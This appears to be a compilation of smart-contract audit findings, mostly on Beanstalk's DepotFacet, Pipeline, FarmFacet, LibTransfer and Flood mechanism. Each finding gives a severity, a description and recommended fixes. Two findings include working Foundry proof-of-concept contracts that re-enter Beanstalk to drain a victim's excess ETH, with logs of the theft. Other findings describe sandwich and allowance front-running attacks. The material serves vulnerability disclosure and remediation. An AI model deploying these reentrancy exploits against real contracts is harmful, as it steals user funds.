```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n
Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contract
high
Pipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, "Eth transfer Failed.");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. 
For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate their exploit from denial-of-service to the stealing of funds.
Add reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.
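As a sketch, a simple guard in the style of OpenZeppelin's `ReentrancyGuard` applied to `Pipeline::advancedPipe` (illustrative only; the Beanstalk facets would need an equivalent guard backed by Diamond storage):\\n```\\nuint256 private _status = 1;\\n\\nmodifier nonReentrant() {\\n require(_status == 1, "ReentrancyGuard: reentrant call");\\n _status = 2;\\n _;\\n _status = 1;\\n}\\n\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n nonReentrant\\n returns (bytes[] memory results)\\n{\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n}\\n```\\n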
A malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork("mainnet", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr("victim");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr("exploiter1");\\n console.log("exploiter1: ", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, "Beanstalk Diamond");\\n vm.label(address(dummyNFT), "DummyNFT");\\n vm.label(address(exploiter), "Exploiter");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint("Victim balance before: ", victim.balance);\\n emit log_named_uint("BEANSTALK balance before: ", BEANSTALK.balance);\\n emit log_named_uint("PIPELINE balance before: ", PIPELINE.balance);\\n emit log_named_uint("DummyNFT balance before: ", address(dummyNFT).balance);\\n emit log_named_uint("Exploiter balance before: ", address(exploiter).balance);\\n emit log_named_uint("Exploiter1 balance before: ", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint("Victim balance after: ", victim.balance);\\n emit log_named_uint("BEANSTALK balance after: ", BEANSTALK.balance);\\n emit log_named_uint("PIPELINE balance after: ", PIPELINE.balance);\\n emit log_named_uint("DummyNFT balance after: ", address(dummyNFT).balance);\\n emit log_named_uint("Exploiter balance after: ", address(exploiter).balance);\\n emit log_named_uint("Exploiter1 balance after: ", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log("minting/transferring NFT");\\n // console.log("msg.value: ", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log("sending royalties");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}("");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log("entered exploiter fallback");\\n console.log("Beanstalk balance: ", BEANSTALK.balance);\\n console.log("Pipeline balance: ", PIPELINE.balance);\\n console.log("Exploiter balance: ", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log("exploiting depot facet advanced pipe");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n 
console.log("exploiting pipeline advanced pipe");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), "", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\n
```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n
`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contract
high
The `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originating in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the "clipboard" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of the top-level `FarmFacet` function call rather than during intermediate Farm calls within Beanstalk, so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, "Eth transfer Failed.");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed "safely" by calling `Fertilizer1155::__doSafeTransferAcceptanceCheck`, which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed since `s.isFarm == 1` in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.
Add a reentrancy guard to `FarmFacet` Farm functions.
A malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log("entered exploiter onERC1155Received");\\n if (!exploited) {\\n exploited = true;\\n console.log("exploiting farm facet farm call");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log("finished exploiting farm facet farm call");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log("entered exploiter fallback");\\n console.log("Beanstalk balance: ", BEANSTALK.balance);\\n console.log("Exploiter balance: ", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork("mainnet", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, TOKEN_ID), 1, "Victim does not have token");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, "VICTIM");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, "Beanstalk Diamond");\\n vm.label(FERTILIZER, "Fertilizer");\\n vm.label(address(exploiter), "Exploiter");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint("VICTIM balance before: ", VICTIM.balance);\\n emit log_named_uint("BEANSTALK balance before: ", BEANSTALK.balance);\\n emit log_named_uint("Exploiter balance before: ", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), "Incorrect facet address/invalid function");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint("VICTIM balance after: ", VICTIM.balance);\\n emit log_named_uint("BEANSTALK balance after: ", BEANSTALK.balance);\\n emit log_named_uint("Exploiter balance after: ", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance 
before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\n
```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n
Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' mode
medium
Beanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nThis direct transfer avoids duplicating fee-on-transfer token fees that would otherwise be incurred if funds were first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient to cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.
Add an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n // internal balances are backed by tokens held in the Diamond, so forward them to the recipient\\n token.safeTransfer(recipient, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\n
`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on token transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.
```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n
Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USD
medium
A call to the BEAN/3CRV Metapool is made within `Weather::sop`, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as "Flood" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been "Oversaturated" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` is calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN, effectively maintaining the price of BEAN above peg.\\nThe cost of performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm` call, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.
Consider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle, ) = LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n int256 newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods - s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical, as the excess Beans minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. If no one attempts the attack, the behavior will remain as originally intended.
Attempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.
```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n
Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intended
low
When updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. `PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n "Silo: decreased allowance below zero"\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.
Set the allowance to zero if the intended subtracted value exceeds the current allowance.
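A hedged sketch of the clamping behavior, adapting the shared logic quoted above (the `allowance`/`_approve` helper names are assumed):\\n```\\nuint256 currentAllowance = allowance(msg.sender, spender);\\n// clamp to zero instead of reverting so a revocation cannot be front-run into a revert\\nuint256 newAllowance = currentAllowance > subtractedValue\\n ? currentAllowance - subtractedValue\\n : 0;\\n_approve(msg.sender, spender, newAllowance);\\n```\\n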
Requiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, potential loss of user funds via a different route to the same approval front-running attack vector.
```\\nrequire(\\n currentAllowance >= subtractedValue,\\n "Silo: decreased allowance below zero"\\n);\\n```\\n
Non-standard ERC20 tokens are not supported
medium
The protocol implements a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, "Deposit amount must be greater than 0");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), "Token address must be 0x0 for ETH deposits");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), "Token address must not be 0x0 for token deposits");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at line L49, we can see that the protocol assumes `amount` of tokens were transferred. This does not hold true for some non-standard ERC20 tokens, such as fee-on-transfer or rebalancing tokens.\\nFor example, if a token charges a fee on transfer, the actually transferred amount will be less than the provided `amount` parameter, and `deposits` will record an incorrect value. Because the current implementation only allows full withdrawal, the tokens will be locked in the contract permanently.
